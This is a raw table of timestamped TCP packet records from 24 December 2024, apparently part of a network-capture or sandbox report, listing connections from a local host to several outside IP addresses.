                                                                                                                                                                                                                                                                                                        TCP Packets

                                                                                                                                                                                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:26:49.339080095 CET4434971320.198.118.190192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:26:49.339098930 CET4434971320.198.118.190192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:26:49.339107990 CET4434971320.198.118.190192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:26:49.764139891 CET4434971320.198.118.190192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:26:49.817822933 CET49713443192.168.2.620.198.118.190
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:26:50.000591040 CET4434971320.198.118.190192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:26:50.052192926 CET49713443192.168.2.620.198.118.190
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:26:50.192730904 CET4434971320.198.118.190192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:26:50.194521904 CET49713443192.168.2.620.198.118.190
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:26:50.314249992 CET4434971320.198.118.190192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:26:50.739707947 CET4434971320.198.118.190192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:26:50.786564112 CET49713443192.168.2.620.198.118.190
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:26:51.317965984 CET49673443192.168.2.6173.222.162.64
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:26:51.318003893 CET49674443192.168.2.6173.222.162.64
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:26:51.599131107 CET49672443192.168.2.6173.222.162.64
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:26:58.488861084 CET49715443192.168.2.620.198.119.84
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:26:58.488926888 CET4434971520.198.119.84192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:26:58.489046097 CET49715443192.168.2.620.198.119.84
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:26:58.490117073 CET49715443192.168.2.620.198.119.84
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:26:58.490129948 CET4434971520.198.119.84192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:00.730648041 CET4434971520.198.119.84192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:00.730717897 CET49715443192.168.2.620.198.119.84
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:00.738517046 CET49715443192.168.2.620.198.119.84
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:00.738529921 CET4434971520.198.119.84192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:00.738759041 CET4434971520.198.119.84192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:00.741127968 CET49715443192.168.2.620.198.119.84
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:00.741384029 CET49715443192.168.2.620.198.119.84
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:00.741394043 CET4434971520.198.119.84192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:00.741633892 CET49715443192.168.2.620.198.119.84
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:00.783330917 CET4434971520.198.119.84192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:00.927179098 CET49674443192.168.2.6173.222.162.64
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:00.927190065 CET49673443192.168.2.6173.222.162.64
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:01.208421946 CET49672443192.168.2.6173.222.162.64
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:01.299587011 CET4434971520.198.119.84192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:01.299710035 CET4434971520.198.119.84192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:01.299760103 CET49715443192.168.2.620.198.119.84
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:01.299990892 CET49715443192.168.2.620.198.119.84
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:01.300004959 CET4434971520.198.119.84192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:03.672630072 CET44349705173.222.162.64192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:03.672749996 CET49705443192.168.2.6173.222.162.64
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:10.058839083 CET49731443192.168.2.620.198.119.84
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:10.058909893 CET4434973120.198.119.84192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:10.058986902 CET49731443192.168.2.620.198.119.84
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:10.059540987 CET49731443192.168.2.620.198.119.84
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:10.059559107 CET4434973120.198.119.84192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:12.365900040 CET4434973120.198.119.84192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:12.365983963 CET49731443192.168.2.620.198.119.84
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:12.367821932 CET49731443192.168.2.620.198.119.84
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:12.367835045 CET4434973120.198.119.84192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:12.368058920 CET4434973120.198.119.84192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:12.370295048 CET49731443192.168.2.620.198.119.84
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:12.370374918 CET49731443192.168.2.620.198.119.84
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:12.370379925 CET4434973120.198.119.84192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:12.370533943 CET49731443192.168.2.620.198.119.84
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:12.411326885 CET4434973120.198.119.84192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:12.916533947 CET4434973120.198.119.84192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:12.917236090 CET49731443192.168.2.620.198.119.84
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:12.917260885 CET4434973120.198.119.84192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:12.917289972 CET49731443192.168.2.620.198.119.84
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:12.917315960 CET49731443192.168.2.620.198.119.84
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:31.585385084 CET49780443192.168.2.620.198.119.84
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:31.585431099 CET4434978020.198.119.84192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:31.585520029 CET49780443192.168.2.620.198.119.84
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:31.586039066 CET49780443192.168.2.620.198.119.84
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:31.586057901 CET4434978020.198.119.84192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:33.812613964 CET4434978020.198.119.84192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:33.812700987 CET49780443192.168.2.620.198.119.84
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:33.814539909 CET49780443192.168.2.620.198.119.84
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:33.814551115 CET4434978020.198.119.84192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:33.814764023 CET4434978020.198.119.84192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:33.816370010 CET49780443192.168.2.620.198.119.84
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:33.816426992 CET49780443192.168.2.620.198.119.84
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:33.816431999 CET4434978020.198.119.84192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:33.816567898 CET49780443192.168.2.620.198.119.84
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:33.863329887 CET4434978020.198.119.84192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:34.484359026 CET4434978020.198.119.84192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:34.484452009 CET4434978020.198.119.84192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:34.484661102 CET49780443192.168.2.620.198.119.84
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:34.484816074 CET49780443192.168.2.620.198.119.84
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:34.484834909 CET4434978020.198.119.84192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:37.590883017 CET49792443192.168.2.6149.154.167.99
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:37.590928078 CET44349792149.154.167.99192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:37.591010094 CET49792443192.168.2.6149.154.167.99
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:37.603272915 CET49792443192.168.2.6149.154.167.99
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:37.603285074 CET44349792149.154.167.99192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:38.848789930 CET804970044.206.23.126192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:38.848901987 CET4970080192.168.2.644.206.23.126
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:38.849977970 CET4970080192.168.2.644.206.23.126
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:38.969917059 CET804970044.206.23.126192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:38.977988005 CET44349792149.154.167.99192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:38.978061914 CET49792443192.168.2.6149.154.167.99
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:39.026784897 CET49792443192.168.2.6149.154.167.99
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:39.026817083 CET44349792149.154.167.99192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:39.027149916 CET44349792149.154.167.99192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:39.027211905 CET49792443192.168.2.6149.154.167.99
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:39.030814886 CET49792443192.168.2.6149.154.167.99
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:39.071343899 CET44349792149.154.167.99192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:39.535603046 CET44349792149.154.167.99192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:39.535636902 CET44349792149.154.167.99192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:39.535675049 CET44349792149.154.167.99192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:39.535695076 CET44349792149.154.167.99192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:39.535721064 CET49792443192.168.2.6149.154.167.99
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:39.535757065 CET49792443192.168.2.6149.154.167.99
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:39.540616035 CET49792443192.168.2.6149.154.167.99
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:39.540637016 CET44349792149.154.167.99192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:39.875399113 CET49800443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:39.875453949 CET44349800188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:39.875531912 CET49800443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:39.875837088 CET49800443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:39.875852108 CET44349800188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:41.695168972 CET44349800188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:41.695267916 CET49800443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:41.699299097 CET49800443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:41.699311018 CET44349800188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:41.699570894 CET44349800188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:41.699632883 CET49800443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:41.700086117 CET49800443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:41.747325897 CET44349800188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:42.387168884 CET44349800188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:42.387346983 CET44349800188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:42.387435913 CET49800443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:42.390614986 CET49800443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:42.390635967 CET44349800188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:42.392646074 CET49806443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:42.392673969 CET44349806188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:42.392739058 CET49806443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:42.392920971 CET49806443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:42.392931938 CET44349806188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:43.799854994 CET44349806188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:43.800062895 CET49806443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:43.800453901 CET49806443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:43.800467968 CET44349806188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:43.802160978 CET49806443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:43.802166939 CET44349806188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:44.693734884 CET44349806188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:44.693820000 CET44349806188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:44.693864107 CET49806443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:44.693898916 CET49806443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:44.696842909 CET49806443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:44.696871042 CET44349806188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:44.698333025 CET49812443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:44.698374987 CET44349812188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:44.698443890 CET49812443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:44.698643923 CET49812443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:44.698659897 CET44349812188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:46.121643066 CET44349812188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:46.121711969 CET49812443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:46.122092962 CET49812443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:46.122098923 CET44349812188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:46.123785019 CET49812443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:46.123790026 CET44349812188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:46.583738089 CET4970180192.168.2.652.222.144.19
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:46.583792925 CET4970280192.168.2.654.230.112.123
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:46.583851099 CET4970780192.168.2.6199.232.214.172
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:46.705157995 CET804970152.222.144.19192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:46.705208063 CET804970254.230.112.123192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:46.705267906 CET4970280192.168.2.654.230.112.123
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:46.705277920 CET4970180192.168.2.652.222.144.19
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:46.705296993 CET8049707199.232.214.172192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:46.705401897 CET4970780192.168.2.6199.232.214.172
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:47.008514881 CET44349812188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:47.008538961 CET44349812188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:47.008610010 CET44349812188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:47.008642912 CET49812443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:47.008697033 CET49812443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:47.009001970 CET49812443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:47.009020090 CET44349812188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:47.010493040 CET49818443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:47.010543108 CET44349818188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:47.010618925 CET49818443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:47.010827065 CET49818443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:47.010843039 CET44349818188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:48.443416119 CET44349818188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:48.443600893 CET49818443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:48.444060087 CET49818443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:48.444072962 CET44349818188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:48.445735931 CET49818443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:48.445746899 CET44349818188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:48.911957979 CET4971480192.168.2.652.222.144.28
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:48.911993027 CET4971180192.168.2.6199.232.214.172
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:49.032809973 CET804971452.222.144.28192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:49.032844067 CET8049711199.232.214.172192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:49.032854080 CET4971480192.168.2.652.222.144.28
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:49.032895088 CET4971180192.168.2.6199.232.214.172
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:49.376780033 CET44349818188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:49.376813889 CET44349818188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:49.376902103 CET44349818188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:49.376966000 CET49818443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:49.377017021 CET49818443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:49.377381086 CET49818443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:49.377398968 CET44349818188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:49.379153967 CET49824443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:49.379204035 CET44349824188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:49.379277945 CET49824443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:49.379556894 CET49824443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:49.379574060 CET44349824188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:50.797024965 CET44349824188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:50.797236919 CET49824443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:50.797713041 CET49824443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:50.797722101 CET44349824188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:50.799283981 CET49824443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:50.799289942 CET44349824188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:51.679752111 CET44349824188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:51.679841042 CET44349824188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:51.679919958 CET49824443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:51.680068970 CET49824443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:51.680085897 CET44349824188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:51.704438925 CET49834443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:51.704479933 CET44349834188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:51.704566002 CET49834443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:51.704797983 CET49834443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:51.704811096 CET44349834188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:53.029625893 CET49835443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:53.029711962 CET44349835188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:53.029812098 CET49835443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:53.031013012 CET49835443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:53.031049967 CET44349835188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:53.114785910 CET44349834188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:53.114865065 CET49834443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:53.115293026 CET49834443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:53.115298986 CET44349834188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:53.117841959 CET49834443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:53.117846966 CET44349834188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:53.117930889 CET49834443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:53.117940903 CET44349834188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:54.113795042 CET44349834188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:54.113868952 CET49834443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:54.113884926 CET44349834188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:54.113900900 CET44349834188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:54.113930941 CET49834443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:54.114023924 CET49834443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:54.114649057 CET49834443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:54.114666939 CET44349834188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:54.472331047 CET44349835188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:54.474287033 CET49835443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:54.475172043 CET49835443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:54.475204945 CET44349835188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:54.477448940 CET49835443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:54.477463007 CET44349835188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:54.592391968 CET49841443192.168.2.620.198.119.84
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:54.592421055 CET4434984120.198.119.84192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:54.592511892 CET49841443192.168.2.620.198.119.84
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:54.593497038 CET49841443192.168.2.620.198.119.84
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:54.593509912 CET4434984120.198.119.84192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:55.519650936 CET44349835188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:55.519717932 CET44349835188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:55.519731998 CET49835443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:55.519938946 CET49835443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:55.885806084 CET49835443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:55.885849953 CET44349835188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:56.561036110 CET49852443192.168.2.6142.250.181.68
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:56.561088085 CET44349852142.250.181.68192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:56.561206102 CET49852443192.168.2.6142.250.181.68
